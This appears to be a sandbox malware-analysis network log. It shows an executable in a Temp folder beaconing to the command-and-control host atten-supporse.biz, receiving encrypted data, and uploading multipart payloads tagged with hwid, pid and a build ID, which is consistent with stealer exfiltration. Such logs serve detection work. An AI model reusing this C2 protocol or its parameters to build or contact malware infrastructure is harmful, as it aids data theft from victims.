2024-12-10 10:11:24 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-10 10:11:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-10 10:11:24 UTC	1017	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d996s6km9bumgkgo648ptd2ii9; expires=Sat, 05-Apr-2025 03:58:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S79gCw54Ms4D01%2F3VRaN0C%2F%2Fw1PGTKTtKoUPl0EsoL9r4IIM1QVRHEHemlLC0tq276nwfOlN61sLL4Kl7GH5CVHPG5KosJUyz0Jf%2FTXQSwpZs7S5zZhoGJ9RzbFzWhJWy3Oc7s4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc735ddf1c1885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1633&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1788120&cwnd=193&unsent_bytes=0&cid=52c182cf1ae3b2e8&ts=814&x=0"
2024-12-10 10:11:24 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-10 10:11:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49881	104.21.32.1	443	1264	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:26 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-10 10:11:26 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-10 10:11:28 UTC	1024	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mltlg0djbk5meggqcpoucp6qoj; expires=Sat, 05-Apr-2025 03:58:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELaAuCuz4eJd%2FbRAqb5%2BUiCd3Q2dI%2FSs3c9PhQIKV8rLku2WCSii3qjFGdX%2Ba%2Btv5X0hxtYDMB9qbTMSNgxlLl7xt1tKsYLrMndOd%2FZrKMPSEAg13avIFNlr%2FuQ2JNUMXmIptv4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc736d3f517cac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1808&rtt_var=688&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1577525&cwnd=197&unsent_bytes=0&cid=f1456a571f7db91f&ts=2073&x=0"
2024-12-10 10:11:28 UTC	345	IN	Data Raw: 31 64 33 35 0d 0a 79 6e 58 44 36 52 62 6e 6a 6a 42 6b 6b 52 47 4b 6b 79 34 48 31 54 4a 38 6c 46 41 65 71 47 39 6c 78 41 6d 6a 79 64 4f 55 42 64 43 78 56 37 58 4c 4c 4e 4f 69 45 68 66 30 4d 37 44 6e 58 48 4b 77 48 6c 37 31 4e 44 79 53 43 51 53 6f 65 73 62 6c 38 65 4a 6f 38 76 41 54 6f 6f 56 6c 67 71 49 53 41 65 6b 7a 73 4d 68 56 4a 62 42 63 58 71 35 79 65 38 49 4e 42 4b 68 72 77 71 4b 38 35 47 6d 7a 6f 68 6d 6b 67 58 4f 45 36 6c 45 49 2f 48 54 76 39 6b 39 74 75 31 73 52 2f 44 30 38 68 45 30 41 76 69 75 5a 36 35 37 78 63 62 47 48 46 4c 43 43 4e 4a 71 69 53 30 62 30 66 36 69 70 44 47 61 77 55 42 44 79 4e 48 58 41 42 77 32 67 61 73 65 6a 6f 2f 31 6a 75 4b 49 58 70 34 42 35 6a 66 35 63 41 76 74 2f 36 66 78 50 4a 66 6b 51 47 65 35 79 4a 49 70 65 4e 61 56 36 30 Data Ascii: 1d35ynXD6RbnjjBkkRGKky4H1TJ8lFAeqG9lxAmjydOUBdCxV7XLLNOiEhf0M7DnXHKwHl71NDySCQSoesbl8eJo8vATooVlgqISAekzsMhVJbBcXq5ye8INBKhrwqK85GmzohmkgXOE6lEI/HTv9k9tu1sR/D08hE0AviuZ657xcbGHFLCCNJqiS0b0f6ipDGawUBDyNHXABw2gasejo/1juKIXp4B5jf5cAvt/6fxPJfkQGe5yJIpeNaV60
2024-12-10 10:11:28 UTC	1369	IN	Data Raw: 72 38 76 42 58 70 34 56 31 69 4f 78 41 44 76 68 34 37 65 4e 48 62 4c 70 64 48 76 73 34 63 38 6b 4e 41 4b 78 68 7a 71 47 31 2b 32 71 30 71 42 66 68 78 54 53 43 39 42 4a 65 73 31 44 74 34 55 74 70 6f 52 49 6b 74 69 30 79 30 30 30 41 71 69 75 5a 36 37 6e 7a 5a 4c 47 6a 47 4b 4b 44 66 35 66 73 51 41 44 2b 64 76 72 33 53 57 75 39 55 77 7a 38 50 48 72 4a 42 41 79 76 62 73 61 76 38 62 67 6e 74 62 42 58 2b 63 74 56 69 4f 64 65 44 4f 52 7a 71 4f 34 43 66 50 64 58 45 72 5a 71 50 4d 34 4d 41 36 64 76 7a 36 57 31 2b 6d 47 38 70 52 69 6e 67 58 53 43 35 6c 6f 4f 38 6e 37 6a 2f 6b 78 67 75 6c 51 59 2b 6a 4e 35 69 6b 4e 48 6f 58 4f 42 38 2f 48 59 59 4c 47 36 56 5a 53 49 65 6f 76 72 52 45 62 73 50 66 47 78 53 32 6e 33 43 46 37 34 4e 33 50 59 44 42 57 6a 5a 64 4f 6e 74 50 Data Ascii: r8vBXp4V1iOxADvh47eNHbLpdHvs4c8kNAKxhzqG1+2q0qBfhxTSC9BJes1Dt4UtpoRIkti0y000AqiuZ67nzZLGjGKKDf5fsQAD+dvr3SWu9Uwz8PHrJBAyvbsav8bgntbBX+ctViOdeDORzqO4CfPdXErZqPM4MA6dvz6W1+mG8pRingXSC5loO8n7j/kxgulQY+jN5ikNHoXOB8/HYYLG6VZSIeovrREbsPfGxS2n3CF74N3PYDBWjZdOntP
2024-12-10 10:11:28 UTC	1369	IN	Data Raw: 56 5a 53 49 65 6f 76 72 52 45 62 73 50 66 47 78 53 32 6e 33 43 46 37 37 4f 6e 6e 50 41 67 61 73 5a 63 53 68 76 66 35 70 73 62 6f 59 70 59 74 34 6a 65 5a 66 43 50 64 37 34 66 70 48 59 37 64 52 46 4c 5a 38 50 4d 30 56 52 2f 34 72 39 61 79 39 2b 32 6a 77 6e 52 53 76 68 58 4f 54 72 45 31 49 36 6a 50 76 2f 51 77 39 39 31 77 58 39 6a 6c 32 7a 67 30 41 71 32 37 43 72 4c 4c 37 59 4c 69 6d 45 4b 57 48 66 59 6a 71 55 67 48 33 64 76 72 30 52 57 6d 37 45 46 43 32 4e 57 53 4b 56 55 65 4a 62 4e 65 6f 6e 76 56 32 75 2b 67 49 37 35 49 30 67 75 41 53 58 72 4e 30 37 66 6c 48 59 37 39 51 44 50 4d 38 64 38 73 48 41 61 64 6d 7a 61 32 78 39 32 65 30 70 42 65 6d 6a 47 61 58 36 56 51 55 2b 54 4f 6d 73 55 74 39 39 77 68 65 77 43 4a 72 32 78 74 46 6b 32 6a 50 70 62 62 67 4a 36 33 Data Ascii: VZSIeovrREbsPfGxS2n3CF77OnnPAgasZcShvf5psboYpYt4jeZfCPd74fpHY7dRFLZ8PM0VR/4r9ay9+2jwnRSvhXOTrE1I6jPv/Qw991wX9jl2zg0Aq27CrLL7YLimEKWHfYjqUgH3dvr0RWm7EFC2NWSKVUeJbNeonvV2u+gI75I0guASXrN07flHY79QDPM8d8sHAadmza2x92e0pBemjGaX6VQU+TOmsUt99whewCJr2xtFk2jPpbbgJ63
2024-12-10 10:11:28 UTC	1369	IN	Data Raw: 6e 47 4b 35 6b 41 4f 2f 58 37 6a 2f 6b 64 33 74 31 30 61 2b 6a 5a 30 77 51 64 48 36 43 76 47 73 2f 47 75 4a 34 65 6c 47 4b 47 49 59 73 58 7a 48 42 2b 7a 64 4f 53 78 46 43 57 37 58 68 37 35 50 6e 44 42 42 51 61 71 5a 63 61 75 75 50 35 76 6f 4b 6b 54 71 59 70 36 69 75 31 57 41 2f 5a 33 37 2f 56 4b 61 76 63 65 58 76 45 71 50 4a 4a 4e 4b 49 46 65 67 34 71 4c 74 6e 6a 38 73 56 65 6d 68 7a 54 64 72 46 34 46 2f 33 76 6e 39 30 56 70 76 56 6b 56 2b 6a 6c 34 78 67 51 43 6f 47 72 45 72 72 44 79 61 37 69 75 46 4b 4b 45 65 34 72 6b 45 6b 69 7a 64 50 43 78 46 43 57 53 52 78 58 34 4e 44 7a 56 51 78 37 6d 62 4d 33 72 36 62 5a 72 75 36 34 52 70 49 64 31 67 2b 52 58 44 76 64 79 37 76 64 50 61 72 4e 56 48 2f 6b 32 63 4d 51 48 42 71 64 6e 79 71 53 36 38 79 66 38 36 42 43 35 Data Ascii: nGK5kAO/X7j/kd3t10a+jZ0wQdH6CvGs/GuJ4elGKGIYsXzHB+zdOSxFCW7Xh75PnDBBQaqZcauuP5voKkTqYp6iu1WA/Z37/VKavceXvEqPJJNKIFeg4qLtnj8sVemhzTdrF4F/3vn90VpvVkV+jl4xgQCoGrErrDya7iuFKKEe4rkEkizdPCxFCWSRxX4NDzVQx7mbM3r6bZru64RpId1g+RXDvdy7vdParNVH/k2cMQHBqdnyqS68yf86BC5
2024-12-10 10:11:28 UTC	1369	IN	Data Raw: 6c 59 43 76 52 32 34 2f 35 41 4a 66 6b 51 47 65 35 79 4a 49 6f 6a 44 4c 56 38 77 71 57 36 34 48 7a 79 74 31 6d 34 79 33 4f 4a 72 41 70 47 38 48 6a 6a 39 55 78 70 74 31 51 54 39 69 42 7a 7a 51 6f 4f 72 58 6e 4c 72 4c 62 39 62 37 6d 6e 45 62 4f 48 65 70 66 70 51 42 53 7a 50 61 6a 32 56 43 58 76 45 43 6a 78 49 6d 7a 4a 54 7a 61 77 61 4e 65 67 76 50 6f 6e 72 65 59 4f 34 59 78 34 78 62 51 53 41 50 78 36 36 2f 35 4e 62 4c 74 64 47 2f 38 33 66 63 77 4a 44 61 78 72 78 36 32 77 38 32 32 78 71 52 32 6f 6a 48 79 43 37 30 42 47 76 54 50 76 36 51 77 39 39 33 6b 5a 35 44 78 73 69 68 4a 4a 76 79 76 47 70 2f 47 75 4a 37 61 69 47 4b 57 4d 65 49 50 70 56 41 76 79 66 4f 6e 78 51 32 47 38 57 52 6a 33 50 33 6e 48 43 52 57 73 59 4d 36 6e 75 50 70 71 38 75 5a 58 70 70 4d 30 33 Data Ascii: lYCvR24/5AJfkQGe5yJIojDLV8wqW64Hzyt1m4y3OJrApG8Hjj9Uxpt1QT9iBzzQoOrXnLrLb9b7mnEbOHepfpQBSzPaj2VCXvECjxImzJTzawaNegvPonreYO4Yx4xbQSAPx66/5NbLtdG/83fcwJDaxrx62w822xqR2ojHyC70BGvTPv6Qw993kZ5DxsihJJvyvGp/GuJ7aiGKWMeIPpVAvyfOnxQ2G8WRj3P3nHCRWsYM6nuPpq8uZXppM03
2024-12-10 10:11:28 UTC	1369	IN	Data Raw: 68 63 2b 58 37 58 6d 2b 38 56 52 50 37 50 33 2f 4d 43 77 79 71 65 63 69 72 73 76 30 6e 2f 4f 67 51 75 63 73 73 78 63 39 46 45 50 6c 30 35 4f 64 48 5a 4c 52 47 45 2b 5a 79 4d 6f 6f 63 41 4c 63 72 6d 62 32 68 34 57 43 74 35 67 37 68 6a 48 6a 46 74 42 49 41 2b 6e 58 76 39 30 4a 33 73 6c 59 52 2b 54 74 31 7a 67 55 45 70 6d 2f 46 72 4c 54 31 61 37 6d 76 46 4b 36 50 66 59 76 6c 58 55 61 39 4d 2b 2f 70 44 44 33 33 63 51 58 31 50 6e 47 4b 45 6b 6d 2f 4b 38 61 6e 38 61 34 6e 76 71 59 53 6f 59 46 79 67 65 6c 55 44 50 5a 7a 34 2f 4a 44 59 62 46 55 45 66 59 35 64 63 73 4c 41 71 78 67 78 36 61 79 38 47 48 79 35 6c 65 6d 6b 7a 54 64 72 48 49 64 2f 6e 2f 76 73 56 4d 72 72 68 41 5a 2b 6e 49 6b 69 67 59 4c 6f 6d 7a 42 70 72 4c 2b 59 72 61 69 45 71 47 44 5a 6f 33 73 56 52 Data Ascii: hc+X7Xm+8VRP7P3/MCwyqecirsv0n/OgQucssxc9FEPl05OdHZLRGE+ZyMoocALcrmb2h4WCt5g7hjHjFtBIA+nXv90J3slYR+Tt1zgUEpm/FrLT1a7mvFK6PfYvlXUa9M+/pDD33cQX1PnGKEkm/K8an8a4nvqYSoYFygelUDPZz4/JDYbFUEfY5dcsLAqxgx6ay8GHy5lemkzTdrHId/n/vsVMrrhAZ+nIkigYLomzBprL+YraiEqGDZo3sVR
2024-12-10 10:11:28 UTC	295	IN	Data Raw: 35 77 77 39 39 32 35 65 35 44 46 73 79 51 49 57 6d 43 75 5a 73 6f 2b 32 62 4b 53 76 42 36 4b 64 66 34 6a 67 51 7a 69 7a 4b 37 79 6a 48 6a 66 6c 41 67 47 32 4c 55 4f 45 54 51 62 6d 4d 2f 69 79 38 65 41 6e 36 76 70 5a 34 5a 6b 30 33 61 77 56 42 65 46 68 37 76 4a 61 5a 76 42 75 49 4e 45 6b 64 73 30 64 41 4c 46 6b 67 65 58 78 2b 53 66 71 6b 56 65 6f 6a 47 2b 55 2b 6c 38 57 39 44 50 58 76 77 78 39 39 77 68 65 77 7a 46 79 78 41 6f 52 74 79 62 6d 76 62 76 78 64 37 57 2f 47 4f 48 46 4e 49 4f 73 43 6c 57 39 4d 2b 7a 67 44 44 33 6e 41 6b 57 6a 59 53 75 61 58 78 6a 6f 63 6f 47 39 38 61 34 31 2f 4f 67 46 34 64 4d 30 77 75 39 41 46 50 56 77 2f 76 49 4c 57 34 6c 33 42 50 73 30 61 39 73 7a 4f 61 46 78 7a 4b 32 6d 35 79 75 6e 71 78 6d 76 6a 47 4c 46 6f 68 49 4a 73 79 76 Data Ascii: 5ww9925e5DFsyQIWmCuZso+2bKSvB6Kdf4jgQzizK7yjHjflAgG2LUOETQbmM/iy8eAn6vpZ4Zk03awVBeFh7vJaZvBuINEkds0dALFkgeXx+SfqkVeojG+U+l8W9DPXvwx99whewzFyxAoRtybmvbvxd7W/GOHFNIOsClW9M+zgDD3nAkWjYSuaXxjocoG98a41/OgF4dM0wu9AFPVw/vILW4l3BPs0a9szOaFxzK2m5yunqxmvjGLFohIJsyv
2024-12-10 10:11:28 UTC	1369	IN	Data Raw: 32 31 33 64 0d 0a 45 61 72 49 36 61 78 53 48 54 33 43 45 36 6b 61 53 6d 5a 57 6c 66 30 64 49 2b 79 38 65 41 6e 36 76 70 5a 34 5a 6b 30 33 61 77 56 42 65 46 68 37 76 4a 61 5a 76 42 75 49 4e 67 31 65 73 38 4b 46 2b 52 46 79 72 2b 32 74 69 6e 79 70 31 66 35 73 6a 54 4e 72 47 31 49 73 32 75 6f 71 51 78 51 74 46 34 51 38 53 52 74 68 79 4d 41 6f 47 37 47 75 2f 50 59 62 4b 61 76 56 2b 2f 4c 63 73 57 30 41 6b 69 7a 64 2f 6d 78 46 44 58 6c 43 30 75 6c 5a 53 79 59 45 6b 6d 2f 4b 39 66 72 36 61 51 70 38 72 70 58 2b 63 73 7a 68 76 35 41 41 50 42 6c 36 37 5a 79 57 37 52 47 45 2f 6b 35 66 66 51 7a 4b 61 74 71 77 71 58 7a 78 33 47 2f 75 42 53 6b 6a 45 71 37 34 6c 55 53 39 48 33 75 38 51 77 72 39 31 39 65 72 67 73 38 67 6b 30 34 36 43 76 5a 36 2b 6d 32 55 72 47 6d 47 61 Data Ascii: 213dEarI6axSHT3CE6kaSmZWlf0dI+y8eAn6vpZ4Zk03awVBeFh7vJaZvBuINg1es8KF+RFyr+2tinyp1f5sjTNrG1Is2uoqQxQtF4Q8SRthyMAoG7Gu/PYbKavV+/LcsW0Akizd/mxFDXlC0ulZSyYEkm/K9fr6aQp8rpX+cszhv5AAPBl67ZyW7RGE/k5ffQzKatqwqXzx3G/uBSkjEq74lUS9H3u8Qwr919ergs8gk046CvZ6+m2UrGmGa
2024-12-10 10:11:28 UTC	1369	IN	Data Raw: 2b 68 4a 65 6f 54 32 6f 34 77 77 39 39 78 63 64 35 43 42 36 79 52 73 45 34 56 58 2f 6a 4c 2f 78 5a 71 53 34 47 71 32 71 64 35 54 6d 62 44 6a 6d 63 4f 62 2f 53 33 4f 6d 45 46 43 32 50 54 79 53 4e 45 66 75 4b 2f 37 6c 38 65 34 6e 36 75 67 69 6f 6f 56 36 67 76 70 44 53 39 52 39 37 2f 42 61 64 62 70 63 50 2f 55 6a 64 6f 70 44 52 36 41 72 6d 66 6e 2f 74 6d 4f 6a 36 45 2f 78 32 53 2f 51 76 77 56 57 6f 57 79 6d 36 41 78 7a 39 77 68 4d 75 48 4a 75 69 6c 56 48 34 57 6a 54 75 62 66 31 63 62 48 76 4b 5a 2b 75 59 34 62 38 56 41 58 4e 54 63 50 39 53 6d 4b 74 56 78 6a 51 45 6a 79 45 54 51 6a 6d 4d 2f 6a 72 2b 62 5a 59 2f 4f 67 50 34 64 4d 30 73 4f 39 63 43 50 52 6c 2b 62 78 70 63 72 52 41 47 50 56 79 4d 6f 6f 4c 52 2f 34 37 6a 2b 75 31 35 79 66 71 2b 45 58 36 33 69 66 Data Ascii: +hJeoT2o4ww99xcd5CB6yRsE4VX/jL/xZqS4Gq2qd5TmbDjmcOb/S3OmEFC2PTySNEfuK/7l8e4n6ugiooV6gvpDS9R97/BadbpcP/UjdopDR6Armfn/tmOj6E/x2S/QvwVWoWym6Axz9whMuHJuilVH4WjTubf1cbHvKZ+uY4b8VAXNTcP9SmKtVxjQEjyETQjmM/jr+bZY/OgP4dM0sO9cCPRl+bxpcrRAGPVyMooLR/47j+u15yfq+EX63if

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49912	104.21.32.1	443	1264	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:34 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5V1MRP6S User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12781 Host: atten-supporse.biz
2024-12-10 10:11:34 UTC	12781	OUT	Data Raw: 2d 2d 35 56 31 4d 52 50 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 35 56 31 4d 52 50 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 56 31 4d 52 50 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 56 31 4d 52 50 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --5V1MRP6SContent-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--5V1MRP6SContent-Disposition: form-data; name="pid"2--5V1MRP6SContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5V1MRP6SContent-Di
2024-12-10 10:11:36 UTC	1022	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q3ri5klg3j6u1m712gdd41fhtc; expires=Sat, 05-Apr-2025 03:58:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cj5KqwylY0ezYrp4fvqss2aSghc9NcEcI2k%2BqZepsmrrdXhGjYDqDLm5gFdeFzUSJgrVMeG8JFStwWMP2i%2BSibcCwAIaD%2FNQHm4hTtPeOwDIFdq%2B3WJhXAIcGqdcpjNdGUibBR4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc739fbd85334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2398&min_rtt=2018&rtt_var=1518&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13713&delivery_rate=576733&cwnd=173&unsent_bytes=0&cid=160bb87495797028&ts=1794&x=0"
2024-12-10 10:11:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-10 10:11:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49927	104.21.32.1	443	1264	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:39 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3FTCUR61XW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15035 Host: atten-supporse.biz
2024-12-10 10:11:39 UTC	15035	OUT	Data Raw: 2d 2d 33 46 54 43 55 52 36 31 58 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 36 37 37 41 44 39 44 44 43 41 36 31 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 33 46 54 43 55 52 36 31 58 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 46 54 43 55 52 36 31 58 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 46 54 43 55 52 36 31 58 57 0d 0a 43 6f Data Ascii: --3FTCUR61XWContent-Disposition: form-data; name="hwid"ADB677AD9DDCA61723D904AF30EFEBBC--3FTCUR61XWContent-Disposition: form-data; name="pid"2--3FTCUR61XWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3FTCUR61XWCo
2024-12-10 10:11:41 UTC	1020	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=te0jt827sopiv3q71b33bbm2m4; expires=Sat, 05-Apr-2025 03:58:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AcyiYmdQSRcOBrAred%2BAZwNj7jAuyyZUWsHohieLmVfascS2VbhEO6mcRXMrHqXTE8CikEkf4ZSQuH%2Frflecpj6qO9DiE02VvRAkjqCpKmgJ9zGKBLw8lM%2FkBAtoN1GX4jfayY0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc73bcde3e0f91-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1597&rtt_var=681&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15969&delivery_rate=1828428&cwnd=218&unsent_bytes=0&cid=b9b7b533905da41a&ts=1654&x=0"
2024-12-10 10:11:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-10 10:11:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49935	104.21.32.1	443	5036	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 10:11:43 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-10 10:11:43 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-10 10:11:44 UTC	1020	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6mvg3id0qvikrnssu88m8s0me1; expires=Sat, 05-Apr-2025 03:58:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JjqwKG1Q%2FQ%2FG31Zk6LG7NlFXyNUymeslBIdwevQmcI1GFTlr7lMNnya275s7JZ7yK1URMD7C8HNZe1CvHRbqvLZN2k8wv9LVxtcr0sf%2Bz%2BkQWhMlZA%2BF52UImMNfneVqu0gLs0M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efc73d4bb8a0f91-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1855&min_rtt=1535&rtt_var=1216&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=712368&cwnd=218&unsent_bytes=0&cid=a3890287e5fd8f7c&ts=1558&x=0"
2024-12-10 10:11:44 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-10 10:11:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49938	104.21.32.1	443	1264	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
